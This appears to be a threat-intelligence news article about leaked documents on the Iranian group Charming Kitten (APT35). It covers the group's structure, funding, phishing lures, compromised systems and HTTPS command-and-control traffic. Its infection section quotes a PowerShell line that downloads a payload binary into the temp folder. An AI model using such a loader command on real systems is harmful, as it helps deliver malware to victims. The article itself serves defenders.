Leaked Documents Reveal Iranian Cyber-Espionage Tactics of Charming Kitten

Unveiling Charming Kitten: Leaked Documents Reveal Iranian Cyber Espionage Operations

Recent disclosures have shed light on the clandestine activities of Charming Kitten, also known as APT35, an Iranian state-sponsored cyber-espionage group. These leaks provide unprecedented insights into the group’s internal operations, personnel, and the extensive network of compromised systems spanning five continents.

Organizational Structure and Personnel

The leaked documents reveal that Iran’s Department 40, a division within the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization, orchestrates prolonged cyber intrusion campaigns. These operations seamlessly blend cyber-espionage with surveillance and targeted attacks. For the first time, specific individuals within Charming Kitten have been directly linked to hacking activities, moving beyond the anonymity typically associated with such threat actors.

Financial records within the leaks detail the remuneration of teams identified as the Sisters Team and Brothers Team. These payments are funneled through front companies masquerading as legitimate IT or cloud service providers, illustrating a sophisticated financial infrastructure supporting these cyber operations.

Scope of Compromised Systems

The breadth of systems infiltrated by Charming Kitten is extensive, encompassing VPN gateways, email servers, and command-and-control nodes. These compromised assets are strategically positioned within government offices, universities, and telecommunications providers. This widespread infiltration underscores the group’s capability to access sensitive information across various sectors.

Tactics, Techniques, and Procedures (TTPs)

Charming Kitten employs a variety of deceptive methods to gain initial access to target systems. Common tactics include spear-phishing emails, counterfeit login pages, and malicious document attachments disguised as meeting invitations, pay slips, or policy documents. Once a target interacts with these lures—by enabling scripts or entering credentials—the attackers establish a foothold, leading to full device control and data exfiltration.

Log data from the leaked dashboards indicates that compromised hosts communicate with Iranian-controlled servers over HTTPS at regular intervals. This communication is often camouflaged within normal web traffic, making detection challenging. The infected hosts are typically situated within critical infrastructure components such as email gateways, domain controllers, and user workstations, granting attackers access to emails, file shares, and identity systems.

Infection Mechanism and Command and Control

The infection process often begins with a lightweight loader that executes in memory when a user opens a macro-enabled document or HTML lure. This loader utilizes concise PowerShell commands to retrieve the primary payload from a concealed URL. The following command exemplifies this process:

“`
Invoke-WebRequest $u -OutFile $env:TEMP\svc.exe
“`

Subsequent logs from the leaks show this binary operating as a scheduled task, ensuring persistent access while blending with regular Windows activities.

Implications and Recommendations

The revelations about Charming Kitten’s operations highlight the evolving sophistication of state-sponsored cyber threats. Organizations, particularly those in sectors such as diplomacy, energy, and civil society, must remain vigilant against such advanced persistent threats. Implementing robust cybersecurity measures, including employee training on recognizing phishing attempts, regular system audits, and the deployment of advanced threat detection systems, is crucial in mitigating the risks posed by groups like Charming Kitten.